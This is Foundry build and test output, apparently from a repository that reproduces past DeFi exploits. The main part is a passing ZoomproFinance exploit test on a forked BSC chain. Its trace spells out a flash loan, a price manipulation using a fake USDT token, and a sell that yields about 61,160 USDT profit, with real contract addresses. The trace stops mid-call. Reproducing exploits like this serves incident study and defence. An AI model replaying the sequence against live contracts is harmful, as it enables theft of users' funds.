Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.15s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-09/ZoomproFinance_exp.sol:60:26:
   |
60 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
   |                          ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-09/ZoomproFinance_exp.sol:60:42:
   |
60 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
   |                                          ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-09/ZoomproFinance_exp.sol:60:59:
   |
60 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
   |                                                           ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-09/ZoomproFinance_exp.sol:60:76:
   |
60 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
   |                                                                            ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 677.79ms (1.94ms CPU time)

Ran 1 test for src/test/2022-09/ZoomproFinance_exp.sol:ContractTest
[PASS] testExploit() (gas: 586571)
Logs:
  [Start] Attacker WBNB balance before exploit: 0.000000000000000000
  Zoom balance of attacker:: 424381681323.020083568022798677
  Before manipulate price, Fake USDT balance of pair:: 18198754.777163623656927698
  Before manipulate price, Zoom balance of pair:: 2189362840297.458758244002644819
  After manipulate price, Fake USDT balance of pair:: 19198754.777163623656927698
  After manipulate price, Zoom balance of pair:: 2189362840297.458758244002644819
  After selling Zoom, USDT balance of attacker:: 3070160.283128930726498344
  [End] After repay, Profit: USDT balance of attacker: 61160.283128930726498344

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 21055930 [2.105e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [687771] ContractTest::testExploit()
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Start] Attacker WBNB balance before exploit", val: 0, decimals: 18)
    ├─ [666318] 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00::swap(3000000000000000000000000 [3e24], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [27971] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3000000000000000000000000 [3e24])
    │   │   ├─ emit Transfer(from: 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3000000000000000000000000 [3e24])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000027b46536c66c8e3000000
    │   │   │   @ 0x86163c67671b041a0570f826e28048defbd2664533c4d000d0b8bc65e886d6c5: 0x0000000000000000000000000000000000000000004f045cc10cc6ca5b48833d → 0x0000000000000000000000000000000000000000004c89166da060017848833d
    │   │   └─ ← [Return] true
    │   ├─ [607414] ContractTest::pancakeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3000000000000000000000000 [3e24], 0, 0x00)
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 3000000000000000000000000 [3e24]
    │   │   ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x5a9846062524631C01ec11684539623DAb1Fae58, 100000000000000000000000000000000000000 [1e38])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x5a9846062524631C01ec11684539623DAb1Fae58, value: 100000000000000000000000000000000000000 [1e38])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb15e5e2f7d52bbe7c425b83e6a597cd6f2009a881669b2b43b870e4ae8bb3a74: 0 → 0x000000000000000000000000000000004b3b4ca85a86c47a098a224000000000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [322503] 0x5a9846062524631C01ec11684539623DAb1Fae58::buy(3000000000000000000000000 [3e24])
    │   │   │   ├─ [27934] 0x55d398326f99059fF775485246999027B3197955::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x5a9846062524631C01ec11684539623DAb1Fae58, 3000000000000000000000000 [3e24])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x5a9846062524631C01ec11684539623DAb1Fae58, value: 3000000000000000000000000 [3e24])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x5a9846062524631C01ec11684539623DAb1Fae58, value: 99999999999997000000000000000000000000 [9.999e37])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb15e5e2f7d52bbe7c425b83e6a597cd6f2009a881669b2b43b870e4ae8bb3a74: 0x000000000000000000000000000000004b3b4ca85a86c47a098a224000000000 → 0x000000000000000000000000000000004b3b4ca85a844933b61dbb771d000000
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000027b46536c66c8e3000000 → 0
    │   │   │   │   │   @ 0x92db054b2fd4101b56ef90a8d010920abab4f6711c887c3a9df6a05f9c04f5aa: 0 → 0x000000000000000000000000000000000000000000027b46536c66c8e3000000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [186390] 0x95d6c685979667AD7864809f29FE356F97D98A1D::swapExactTokensForTokens(3000000000000000000000000 [3e24], 0, [0x55d398326f99059fF775485246999027B3197955, 0x62D51AACb079e882b1cb7877438de485Cba0dD3f, 0x9CE084C378B3E65A164aeba12015ef3881E0F853], 0x5a9846062524631C01ec11684539623DAb1Fae58, 1662348485 [1.662e9])
    │   │   │   │   ├─ [2540] 0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 15198754777163623656927698 [1.519e25], 2620645036763942583008253456483 [2.62e30], 1662348362 [1.662e9]
    │   │   │   │   ├─ [2343] 0x95d6c685979667AD7864809f29FE356F97D98A1D::swapRate() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000003e6
    │   │   │   │   ├─ [15634] 0x55d398326f99059fF775485246999027B3197955::transferFrom(0x5a9846062524631C01ec11684539623DAb1Fae58, 0xf72Fd2A9cDF1DB6d000A6181655e0F072fc47208, 3000000000000000000000000 [3e24])
    │   │   │   │   │   ├─ emit Transfer(from: 0x5a9846062524631C01ec11684539623DAb1Fae58, to: 0xf72Fd2A9cDF1DB6d000A6181655e0F072fc47208, value: 3000000000000000000000000 [3e24])
    │   │   │   │   │   ├─ emit Approval(owner: 0x5a9846062524631C01ec11684539623DAb1Fae58, spender: 0x95d6c685979667AD7864809f29FE356F97D98A1D, value: 115792089237316195423570985008687907853269984665640555774529439845913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x3378fd23a1c1cc339ce81e0ce53a4da2eadab37044459f8df6ea493426f34c1c: 0xfffffffffffffffffffffffffffffffffffffffffffba51bac64557c3b63dfff → 0xfffffffffffffffffffffffffffffffffffffffffff929d558f7eeb35863dfff
    │   │   │   │   │   │   @ 0x4a5595ad819661edca1e3c925371eeab0e74e8f79b3c77a8b71fa87113b7e747: 0x0000000000000000000000000000000000000000000011ff2e1f26897896941d → 0x000000000000000000000000000000000000000000028d45818b8d525b96941d
    │   │   │   │   │   │   @ 0x92db054b2fd4101b56ef90a8d010920abab4f6711c887c3a9df6a05f9c04f5aa: 0x000000000000000000000000000000000000000000027b46536c66c8e3000000 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [61950] 0xf72Fd2A9cDF1DB6d000A6181655e0F072fc47208::swap(0, 3000000000000000000000000 [3e24], 0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5, 0x, true)
    │   │   │   │   │   ├─ [20175] 0x62D51AACb079e882b1cb7877438de485Cba0dD3f::transfer(0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5, 3000000000000000000000000 [3e24])
    │   │   │   │   │   │   ├─ emit MyTransfer(param0: 0xf72Fd2A9cDF1DB6d000A6181655e0F072fc47208, param1: 0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5, param2: 3000000000000000000000000 [3e24])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xed14edce0f9ade760a2fdbfb5a12a536b98c1c3509ffbe6e28d76b16f79b402a: 0x0000000000000000000000000000000000000000000848c3067e297116b16be3 → 0x00000000000000000000000000000000000000000005cd7cb311c2a833b16be3
    │   │   │   │   │   │   │   @ 0xf779689b4bc479978c2f4dd4f88ba4b7fff69ad5d720ca4f33b286687dae4018: 0x0000000000000000000000000000000000000000000c927625bd904c5bb531d2 → 0x0000000000000000000000000000000000000000000f0dbc7929f7153eb531d2
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xf72Fd2A9cDF1DB6d000A6181655e0F072fc47208) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 3084987473365001802519581 [3.084e24]
    │   │   │   │   │   ├─ [1022] 0x62D51AACb079e882b1cb7877438de485Cba0dD3f::balanceOf(0xf72Fd2A9cDF1DB6d000A6181655e0F072fc47208) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 7015014526634998197480419 [7.015e24]
    │   │   │   │   │   ├─ emit Swap2PK(: 3078987473365001802519581000 [3.078e27], : 7015014526634998197480419000 [7.015e27], : 84987473365001802519581 [8.498e22], : 10015014526634998197480419 [1.001e25])
    │   │   │   │   │   ├─ emit Sync(reserve0: 3084987473365001802519581 [3.084e24], reserve1: 7015014526634998197480419 [7.015e24])
    │   │   │   │   │   ├─ emit Swap(sender: 0x95d6c685979667AD7864809f29FE356F97D98A1D, amount0In: 3000000000000000000000000 [3e24], amount1In: 0, amount0Out: 0, amount1Out: 3000000000000000000000000 [3e24], to: 0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 11: 0x000000000000000000000000000000002355b689b47e88391a8868687606fc18 → 0x0000000000000000000000000000000023574a9b89d800ec1696e4179d8263d6
    │   │   │   │   │   │   @ 10: 0x0000000000000000000000000002bc2b2eb1dd29aee8cb331847df7b9e5046bb → 0x0000000000000000000000000002bc2b84504d6662f47201e1593544c5d96fbd
    │   │   │   │   │   │   @ 9: 0x63156c0b0000000848c3067e297116b16be30000000011ff2e1f26897896941d → 0x63156cc500000005cd7cb311c2a833b16be3000000028d45818b8d525b96941d
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [73147] 0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5::swap(0, 431282196466483824764250811664 [4.312e29], 0x5a9846062524631C01ec11684539623DAb1Fae58, 0x, false)
    │   │   │   │   │   ├─ [32380] 0x9CE084C378B3E65A164aeba12015ef3881E0F853::transfer(0x5a9846062524631C01ec11684539623DAb1Fae58, 431282196466483824764250811664 [4.312e29])
    │   │   │   │   │   │   ├─ [2706] 0xA92a3e24A9f5C364Af9E27a9af4A96FcC2388ab0::father(0x5a9846062524631C01ec11684539623DAb1Fae58)
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xEc6557348085Aa57C72514D67070dC863C0a5A8c, to: 0x5a9846062524631C01ec11684539623DAb1Fae58, value: 431282196466483824764250811664 [4.312e29])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x069b10d02348461ffdc800421cfcf78167a3d612823682764e66216432d7ebd9: 858 → 0x0000000000000000000000000000000000000005718c457e2a0226e25f3cf06a
    │   │   │   │   │   │   │   @ 0x4e55f09f509bb072e1b3821235e78f8846e50eb9cad4132d5ddd6e47647a01f3: 0x000000000000000000000000000000000000002113c2c44ca41c7594bcd03063 → 0x000000000000000000000000000000000000001ba2367ece7a1a4eb25d934353
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [1022] 0x62D51AACb079e882b1cb7877438de485Cba0dD3f::balanceOf(0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 18198754777163623656927698 [1.819e25]
    │   │   │   │   │   ├─ [1072] 0x9CE084C378B3E65A164aeba12015ef3881E0F853::balanceOf(0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2189362840297458758244002644819 [2.189e30]
    │   │   │   │   │   ├─ emit Swap2PK(: 18192754777163623656927698000 [1.819e28], : 2189362840297458758244002644819000 [2.189e33], : 15198754777163623656927698 [1.519e25], : 2620645036763942583008253456483 [2.62e30])
    │   │   │   │   │   ├─ emit Sync(reserve0: 18198754777163623656927698 [1.819e25], reserve1: 2189362840297458758244002644819 [2.189e30])
    │   │   │   │   │   ├─ emit Swap(sender: 0x95d6c685979667AD7864809f29FE356F97D98A1D, amount0In: 3000000000000000000000000 [3e24], amount1In: 0, amount0Out: 0, amount1Out: 431282196466483824764250811664 [4.312e29], to: 0x5a9846062524631C01ec11684539623DAb1Fae58)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 10: 0x0000000000000000000000000008c632f885d263d468bddd2ea0d3ea27542160 → 0x0000000000000000000000000008c7769556c0aaebc1a4f2349b9ed32dd456ec
    │   │   │   │   │   │   @ 9: 0x63156c4a002113c2c44ca41c7594bcd030630000000c927625bd904c5bb531d2 → 0x63156cc5001ba2367ece7a1a4eb25d9343530000000f0dbc7929f7153eb531d2
    │   │   │   │   │   │   @ 11: 0x000000000000000000000000000000000000d55772a5cf7d5f20179d5237934a → 0x000000000000000000000000000000000000d58632bca1218c32a7145f97e280
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 13: 0 → 1
    │   │   │   │   └─ ← [Return] [3000000000000000000000000 [3e24], 3000000000000000000000000 [3e24], 431282196466483824764250811664 [4.312e29]]
    │   │   │   ├─ [2706] 0xA92a3e24A9f5C364Af9E27a9af4A96FcC2388ab0::father(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─ [24045] 0x9CE084C378B3E65A164aeba12015ef3881E0F853::transfer(0xb0d201428066b2eC92A8cE0fA2ED89d9A39cB27D, 4312821964664838247642508116 [4.312e27])
    │   │   │   │   ├─ [2706] 0xA92a3e24A9f5C364Af9E27a9af4A96FcC2388ab0::father(0xb0d201428066b2eC92A8cE0fA2ED89d9A39cB27D)
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ emit Transfer(from: 0x5a9846062524631C01ec11684539623DAb1Fae58, to: 0xb0d201428066b2eC92A8cE0fA2ED89d9A39cB27D, value: 4312821964664838247642508116 [4.312e27])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x4484d23546fbd11fe561d9424331f3302375688b0ce3529a7d925c8ed4d9153f: 0x000000000000000000000000000000000000000001ea1e451fc05bf19d4a3dad → 0x00000000000000000000000000000000000000000fd999d84e406173e0cd6901
    │   │   │   │   │   @ 0x069b10d02348461ffdc800421cfcf78167a3d612823682764e66216432d7ebd9: 0x0000000000000000000000000000000000000005718c457e2a0226e25f3cf06a → 0x0000000000000000000000000000000000000005639cc9eafb8221601bb9c516
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [19895] 0x9CE084C378B3E65A164aeba12015ef3881E0F853::transfer(0xe033B596b78856F76dDA12a28a51BF1527DB25B1, 2587693178798902948585504869 [2.587e27])
    │   │   │   │   ├─ [2706] 0xA92a3e24A9f5C364Af9E27a9af4A96FcC2388ab0::father(0xe033B596b78856F76dDA12a28a51BF1527DB25B1)
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ emit Transfer(from: 0x5a9846062524631C01ec11684539623DAb1Fae58, to: 0xe033B596b78856F76dDA12a28a51BF1527DB25B1, value: 2587693178798902948585504869 [2.587e27])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x069b10d02348461ffdc800421cfcf78167a3d612823682764e66216432d7ebd9: 0x0000000000000000000000000000000000000005639cc9eafb8221601bb9c516 → 0x00000000000000000000000000000000000000055b404c92ac688478599e44b1
    │   │   │   │   │   @ 0x8578d50ff70c54223dcad776709a5b0daa7a376868b288a8d1c9b7855780589c: 0x0000000000000000000000000000000000000000b4910421fba9ba4e48438bbc → 0x0000000000000000000000000000000000000000bced817a4ac357360a5f0c21
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [32495] 0x9CE084C378B3E65A164aeba12015ef3881E0F853::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 424381681323020083568022798677 [4.243e29])
    │   │   │   │   ├─ [706] 0xA92a3e24A9f5C364Af9E27a9af4A96FcC2388ab0::father(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ emit Transfer(from: 0x5a9846062524631C01ec11684539623DAb1Fae58, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 424381681323020083568022798677 [4.243e29])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x069b10d02348461ffdc800421cfcf78167a3d612823682764e66216432d7ebd9: 0x00000000000000000000000000000000000000055b404c92ac688478599e44b1 → 860
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000055b404c92ac688478599e4155
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb15e5e2f7d52bbe7c425b83e6a597cd6f2009a881669b2b43b870e4ae8bb3a74: 0x000000000000000000000000000000004b3b4ca85a86c47a098a224000000000 → 0x000000000000000000000000000000004b3b4ca85a844933b61dbb771d000000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [1072] 0x9CE084C378B3E65A164aeba12015ef3881E0F853::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 424381681323020083568022798677 [4.243e29]
    │   │   ├─ emit log_named_decimal_uint(key: "Zoom balance of attacker:", val: 424381681323020083568022798677 [4.243e29], decimals: 18)
    │   │   ├─ [1022] 0x62D51AACb079e882b1cb7877438de485Cba0dD3f::balanceOf(0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5) [staticcall]
    │   │   │   └─ ← [Return] 18198754777163623656927698 [1.819e25]
    │   │   ├─ emit log_named_decimal_uint(key: "Before manipulate price, Fake USDT balance of pair:", val: 18198754777163623656927698 [1.819e25], decimals: 18)
    │   │   ├─ [1072] 0x9CE084C378B3E65A164aeba12015ef3881E0F853::balanceOf(0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5) [staticcall]
    │   │   │   └─ ← [Return] 2189362840297458758244002644819 [2.189e30]
    │   │   ├─ emit log_named_decimal_uint(key: "Before manipulate price, Zoom balance of pair:", val: 2189362840297458758244002644819 [2.189e30], decimals: 18)
    │   │   ├─ [14204] 0x47391071824569F29381DFEaf2f1b47A4004933B::batchToken([0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5], [1000000000000000000000000 [1e24]], 0x62D51AACb079e882b1cb7877438de485Cba0dD3f)
    │   │   │   ├─ [11375] 0x62D51AACb079e882b1cb7877438de485Cba0dD3f::transfer(0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5, 1000000000000000000000000 [1e24])
    │   │   │   │   ├─ emit MyTransfer(param0: 0x47391071824569F29381DFEaf2f1b47A4004933B, param1: 0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5, param2: 1000000000000000000000000 [1e24])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x0cabfa78c7e9d657cbb48b05c5f0c13e25b4199e236931cf4b3697e5a992d18a: 0x00000000000000000000000000000000000000000000d3c21bcecceda1000000 → 0
    │   │   │   │   │   @ 0xf779689b4bc479978c2f4dd4f88ba4b7fff69ad5d720ca4f33b286687dae4018: 0x0000000000000000000000000000000000000000000f0dbc7929f7153eb531d2 → 0x0000000000000000000000000000000000000000000fe17e94f8c402dfb531d2
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [1022] 0x62D51AACb079e882b1cb7877438de485Cba0dD3f::balanceOf(0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5) [staticcall]
    │   │   │   └─ ← [Return] 19198754777163623656927698 [1.919e25]
    │   │   ├─ emit log_named_decimal_uint(key: "After manipulate price, Fake USDT balance of pair:", val: 19198754777163623656927698 [1.919e25], decimals: 18)
    │   │   ├─ [1072] 0x9CE084C378B3E65A164aeba12015ef3881E0F853::balanceOf(0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5) [staticcall]
    │   │   │   └─ ← [Return] 2189362840297458758244002644819 [2.189e30]
    │   │   ├─ emit log_named_decimal_uint(key: "After manipulate price, Zoom balance of pair:", val: 2189362840297458758244002644819 [2.189e30], decimals: 18)
    │   │   ├─ [8744] 0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5::sync()
    │   │   │   ├─ [1022] 0x62D51AACb079e882b1cb7877438de485Cba0dD3f::balanceOf(0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5) [staticcall]
    │   │   │   │   └─ ← [Return] 19198754777163623656927698 [1.919e25]
    │   │   │   ├─ [1072] 0x9CE084C378B3E65A164aeba12015ef3881E0F853::balanceOf(0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5) [staticcall]
    │   │   │   │   └─ ← [Return] 2189362840297458758244002644819 [2.189e30]
    │   │   │   ├─ emit Sync(reserve0: 19198754777163623656927698 [1.919e25], reserve1: 2189362840297458758244002644819 [2.189e30])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 9: 0x63156cc5001ba2367ece7a1a4eb25d9343530000000f0dbc7929f7153eb531d2 → 0x63156cc5001ba2367ece7a1a4eb25d9343530000000fe17e94f8c402dfb531d2
    │   │   │   └─ ← [Stop]
    │   │   ├─ [1072] 0x9CE084C378B3E65A164aeba12015ef3881E0F853::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 424381681323020083568022798677 [4.243e29]
    │   │   ├─ [24763] 0x9CE084C378B3E65A164aeba12015ef3881E0F853::approve(0x5a9846062524631C01ec11684539623DAb1Fae58, 42438168132302008356802279867700 [4.243e31])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x5a9846062524631C01ec11684539623DAb1Fae58, value: 42438168132302008356802279867700 [4.243e31])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x72f1ac953a35c1d7fceb8ebbcc7cc42c7147e91c93d1bcbbf42878a8593909c8: 0 → 0x0000000000000000000000000000000000000217a51de94b58d3bf0301d18534
    │   │   │   └─ ← [Return] true
    │   │   ├─ [125819] 0x5a9846062524631C01ec11684539623DAb1Fae58::sell(424381681323020083568022798677 [4.243e29])
    │   │   │   ├─ [11220] 0x9CE084C378B3E65A164aeba12015ef3881E0F853::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x5a9846062524631C01ec11684539623DAb1Fae58, 424381681323020083568022798677 [4.243e29])
    │   │   │   │   ├─ [706] 0xA92a3e24A9f5C364Af9E27a9af4A96FcC2388ab0::father(0x5a9846062524631C01ec11684539623DAb1Fae58)
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x5a9846062524631C01ec11684539623DAb1Fae58, value: 424381681323020083568022798677 [4.243e29])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x5a9846062524631C01ec11684539623DAb1Fae58, value: 42013786450978988273234257069023 [4.201e31])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x069b10d02348461ffdc800421cfcf78167a3d612823682764e66216432d7ebd9: 860 → 0x00000000000000000000000000000000000000055b404c92ac688478599e44b1
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000055b404c92ac688478599e4155 → 0
    │   │   │   │   │   @ 0x72f1ac953a35c1d7fceb8ebbcc7cc42c7147e91c93d1bcbbf42878a8593909c8: 0x0000000000000000000000000000000000000217a51de94b58d3bf0301d18534 → 0x000000000000000000000000000000000000021249dd9cb8ac6b3a8aa83343df
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [706] 0xA92a3e24A9f5C364Af9E27a9af4A96FcC2388ab0::father(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─ [6745] 0x9CE084C378B3E65A164aeba12015ef3881E0F853::transfer(0xb0d201428066b2eC92A8cE0fA2ED89d9A39cB27D, 4243816813230200835680227986 [4.243e27])
    │   │   │   │   ├─ [706] 0xA92a3e24A9f5C364Af9E27a9af4A96FcC2388ab0::father(0xb0d201428066b2eC92A8cE0fA2ED89d9A39cB27D)
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ emit Transfer(from: 0x5a9846062524631C01ec11684539623DAb1Fae58, to: 0xb0d201428066b2eC92A8cE0fA2ED89d9A39cB27D, value: 4243816813230200835680227986 [4.243e27])
    │   │   │   │   ├─  storage changes:
